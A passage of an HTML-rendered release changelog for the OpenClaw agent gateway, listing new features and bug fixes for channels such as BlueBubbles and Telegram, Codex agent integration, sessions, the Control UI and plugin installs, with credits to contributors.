<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
